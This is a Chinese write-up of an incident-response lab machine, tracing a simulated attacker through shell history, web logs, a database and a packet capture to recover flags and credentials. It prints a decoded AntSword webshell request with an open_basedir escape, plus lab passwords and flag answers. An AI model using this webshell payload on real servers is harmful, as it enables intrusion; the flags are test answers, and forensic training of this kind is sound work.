应急响应靶机-Linux(2)-WriteUp

admin 2024年4月1日14:25:58评论31 views字数 3168阅读10分33秒阅读模式

点击蓝字 关注我们

应急响应靶机-Linux(2)-WriteUp

免责声明

本文发布的工具和脚本,仅用作测试和学习研究,禁止用于商业用途,不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断。

如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利,则应及时通知并提供身份证明,所有权证明,我们将在收到认证文件后删除相关内容。

文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用,任何人不得将其应用于非法用途及盈利等目的,间接使用文章中的任何工具、思路及技术,我方对于由此引起的法律后果概不负责。

添加星标不迷路

由于公众号推送规则改变,微信头条公众号信息会被折叠,为了避免错过公众号推送,请大家动动手指设置“星标”,设置之后就可以和从前一样收到推送啦应急响应靶机-Linux(2)-WriteUp

应急响应靶机-Linux(2)-WriteUp

题目

前景需要:看监控的时候发现webshell告警,领导让你上机检查你可以救救安服仔吗!!

挑战内容

1,提交攻击者IP

2,提交攻击者修改的管理员密码(明文)

3,提交第一次Webshell的连接URL(http://xxx.xxx.xxx.xx/abcdefg?abcdefg只需要提交abcdefg?abcdefg)

3,提交Webshell连接密码

4,提交数据包的flag1

5,提交攻击者使用的后续上传的木马文件名称

6,提交攻击者隐藏的flag2

7,提交攻击者隐藏的flag3

相关账户密码

root/Inch@957821.

关于解题

root下,运行"./wp"即可

下载地址

百度网盘链接:https://pan.baidu.com/s/1dZ6TXgLsOiP95oOWyi11wA?pwd=mapi

解题

这里建议大家用xshell解题

首先查看历史命令

应急响应靶机-Linux(2)-WriteUp

应急响应靶机-Linux(2)-WriteUp

可以得到的信息:首先关闭了防火墙而且删除了flag1和flag2还有一个version.php得到了一个flag3以及修改了alinotify.php和mpnotify.php然后我们继续往下看

题目为查看webshell告警了希望我们帮他分析那我们去分析web日志/var/www

应急响应靶机-Linux(2)-WriteUp

应急响应靶机-Linux(2)-WriteUp

我们去看127.0.0.1.log有哪些东西

应急响应靶机-Linux(2)-WriteUp

发现了192.168.20.1这哥们在捣鬼而且发现了可疑的version2.php文件然后继续找

攻击者修改的管理员密码(明文)

我们查看本机开放了哪些端口

netstat -anp

应急响应靶机-Linux(2)-WriteUp

发现3306mysql现在我们得登录上数据库才可以知道被修改的管理员密码

之前我们发现www/wwwlog目录下面有access.log

应急响应靶机-Linux(2)-WriteUp

可以确定为phpmyadmin直接去找配置文件在/www/wwwroot/127.0.0.1/lib目录下config.inc.php

应急响应靶机-Linux(2)-WriteUp

得到数据库账号密码:kaoshi: 5Sx8mK5ieyLPb84m

登录在kaoshi库中的x2_user_group中发现管理员在x2_user中发现被修改的密码

应急响应靶机-Linux(2)-WriteUp

应急响应靶机-Linux(2)-WriteUp

加密密码为:f6f6eb5ace977d7e114377cc7098b7e3

明文密码为:Network@2020(各位师傅们自行解密即可)

flag1

应急响应靶机-Linux(2)-WriteUp

这有一个名为数据包的文件我们把它放在wireshark中打开我们将数据包下载下来放在我们本地的wireshark中

靶机利用python2开启http服务传到本地

systemctl status firewalld

systemctl stop firewalld

python --version

ip a

python -m SimpleHTTPServer

应急响应靶机-Linux(2)-WriteUp

在本地打开发现192.168.20.1这哥们基本确定了他就是攻击者

应急响应靶机-Linux(2)-WriteUp

利用http and ip.src=192.168.20.1检索发现flag1

应急响应靶机-Linux(2)-WriteUp

追踪数据流发现flag

应急响应靶机-Linux(2)-WriteUp

flag1{Network@_2020_Hack}

第一次连接webshell的url及木马文件

通过分析数据包发现url及木马文件

应急响应靶机-Linux(2)-WriteUp

应急响应靶机-Linux(2)-WriteUp

index.php?user-app-register

version2.php

webshell连接密码

通过数据包发现webshell加密流量

应急响应靶机-Linux(2)-WriteUp

进行url解码发现php代码只有蚁剑才会明文传输确定为蚁剑流量且密码为Network2020

Network2020=@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$oparr=preg_split(base64_decode("Lzt8Oi8="),$opdir);
@array_push($oparr,$ocwd,sys_get_temp_dir());
foreach($oparr as $item) {
if(!@is_writable($item)) {
continue;
}
;
$tmdir=$item."/.fd491f470fb7";
@mkdir($tmdir);
if(!@file_exists($tmdir)) {
continue;
}
$tmdir=realpath($tmdir);
@chdir($tmdir);
@ini_set("open_basedir", "..");
$cntarr=@preg_split("/\\|//",$tmdir);
for ($i=0;$i<sizeof($cntarr);$i++) {
@chdir("..");
}
;
@ini_set("open_basedir","/");
@rmdir($tmdir);
break;
}
;
}
;
;
function asenc($out) {
return $out;
}
;
function asoutput() {
$output=ob_get_contents();
ob_end_clean();
echo "4a0c"."dc70";
echo @asenc($output);
echo "db6"."da5";
}
ob_start();
try {
$D=dirname($_SERVER["SCRIPT_FILENAME"]);
if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);
$R="{$D}";
if(substr($D,0,1)!="/") {
foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";
} else {
$R.="/";
}
$R.="";
$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";
$s=($u)?$u["name"]:@get_current_user();
$R.=php_uname();
$R.="{$s}";
echo $R;
;
}
catch(Exception $e) {
echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();

flag2

我们通过history命令可以看到这哥们做贼心虚把version2.php删了对.api文件夹做了手脚还修改了alinotify.php文件我们用diff命令对比

diff

应急响应靶机-Linux(2)-WriteUp

找到flag2

flag{bL5Frin6JVwVw7tJBdqXlHCMVpAenXI9In9}

总结

应急响应靶机-Linux(2)-WriteUp

1.攻击者192.168.20.1通过/index.php?user-app-register上传了一个webshell

2.通过蚁剑连接之后在上传version2.php提权

3.修改数据库密码

4.提权之后关闭了防火墙,并且删除提权文件version2.php和falg1且修改了alinotify.php文件

原文始发于微信公众号(SecHub网络安全社区):应急响应靶机-Linux(2)-WriteUp

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年4月1日14:25:58
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   应急响应靶机-Linux(2)-WriteUphttps://cn-sec.com/archives/2619231.html

发表评论

匿名网友 填写信息